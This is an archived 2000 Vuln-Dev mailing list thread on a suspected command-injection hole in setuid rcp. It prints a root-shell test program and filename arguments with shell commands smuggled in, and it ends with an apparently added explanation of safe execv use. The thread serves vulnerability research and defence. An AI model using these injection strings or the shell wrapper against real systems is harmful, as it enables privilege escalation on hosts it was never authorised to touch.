Vulnerability Development mailing list archives

Re: possible rcp hole...


From: H D Moore <hdm () SECUREAUSTIN COM>
Date: Wed, 22 Nov 2000 00:05:32 -0600

On SuSE 6.4 rcp is not vulnerable. I replaced /bin/sh with this program:

--- ubersh.c ---
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* setuid, seteuid, setreuid, execl */

/* Stand-in for /bin/sh: try to (re)gain root and hand over an interactive
 * bash so the caller can see what credentials the parent passed down. */
int main (int argc, char **argv)
{
        setuid(0);
        seteuid(0);
        setreuid(0, 0);   /* setreuid takes a real and an effective uid */
        execl("/bin/bash", "uber shell", "-i", NULL);
        /* only reached if execl fails */
        printf("exiting root shell...\n");
        return 0;
}
--------------

The rcp program executed my shell with:

$ rcp 'file1 file2;' 127.0.0.1

Which dropped me into the ubersh, where my privs were still that of my user
account.  I am pretty sure rcp drops privs before calling anything (only uses
it for the port bindings), let alone system, or we would have heard something
about this before.

This is still a cool hole if you can find some custom/scripted system that
does rcp backups from user-writable directories.  You could gain access as
whatever user the backups ran as (likely to be privileged).

-HD

http://www.digitaldefense.net
http://www.digitaloffense.net


On Tuesday 21 November 2000 04:11 pm, Andrew Griffiths wrote:
Here is a possible bug in rcp; since I think it calls system(). I
haven't had much time to play with this, because exams are coming up.

It is negated because system() calls /bin/cp which with the newer
versions of bash, it drops its effective credentials...

$ ls -alF  `which rcp`
-rwsr-xr-x    1    root    root        14492    Jul 21 22:43 /usr/sbin/rcp

$ cd /tmp
$ echo bla > bob
$ rcp 'bob bobalina;  /usrt/bin/id;' 127.0.0.1
uid=500(andrewg) gid=500(andrewg) groups=500(andrewg)
sh: 127.0.0.1: command not found.

Now doing a quick ltrace - it doesn't remove ; and ` and other fun
stuff. This could probably be exploited, on older bash versions?
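The thread's point is that rcp assembled a command line for system(3) out of the user's filename without filtering shell metacharacters, and was saved only by dropping privileges first. The following is an added example, not code from either poster, contrasting the two patterns: a check for the metacharacters the shell would interpret, the string that the system()-style assembly produces, and a copy helper that runs /bin/cp through fork/execv so every filename arrives as one argv entry. The function names, the assumed /bin/cp path and the constructed filenames are mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Characters /bin/sh interprets when a command line is handed to system(3).
 * A filename containing any of them changes what the shell runs. */
static const char SHELL_META[] = ";|&$`<>()\"'\\*?[]{} \t\n";

/* Returns 1 if the string would be mangled by the shell, 0 otherwise. */
int has_shell_metachars(const char *s)
{
        return strpbrk(s, SHELL_META) != NULL;
}

/* Unsafe pattern: build the command string the way a system() caller would.
 * Only produces the string for inspection; nothing is executed here.
 * Returns 0 on success, -1 if the buffer is too small. */
int build_cp_command(const char *src, const char *dst, char *out, size_t outlen)
{
        int n = snprintf(out, outlen, "/bin/cp %s %s", src, dst);
        return (n >= 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Safe pattern: no shell at all. Each argument reaches cp as exactly one
 * argv entry, so ';' or spaces inside a filename are just bytes of a name.
 * "--" stops a filename beginning with '-' from being read as an option.
 * Returns cp's exit status, or -1 if cp could not be started or waited for. */
int copy_file_noshell(const char *src, const char *dst)
{
        pid_t pid = fork();
        if (pid < 0)
                return -1;
        if (pid == 0) {
                char *const argv[] = { "/bin/cp", "--", (char *)src, (char *)dst, NULL };
                execv("/bin/cp", argv);   /* assumed path to cp */
                _exit(127);               /* exec failed */
        }
        int status;
        if (waitpid(pid, &status, 0) < 0)
                return -1;
        return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
        /* Constructed filename modelled on the one in the thread. */
        const char *name = "bob bobalina; /usr/bin/id;";
        char cmd[256];

        printf("metachars in \"%s\": %d\n", name, has_shell_metachars(name));
        if (build_cp_command(name, "127.0.0.1:bob", cmd, sizeof cmd) == 0)
                printf("system() would run: %s\n", cmd);

        /* With execv the same name is just a file that does not exist. */
        printf("cp exit status without a shell: %d\n",
               copy_file_noshell(name, "/tmp/bob"));
        return 0;
}
```

Run as an ordinary user: the first line shows the name is unsafe for a shell, the second shows the assembled command with the injected `id` visible, and the third shows cp simply failing to find a file called `bob bobalina; /usr/bin/id;`, which is the behaviour a setuid wrapper should have had in the first place.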
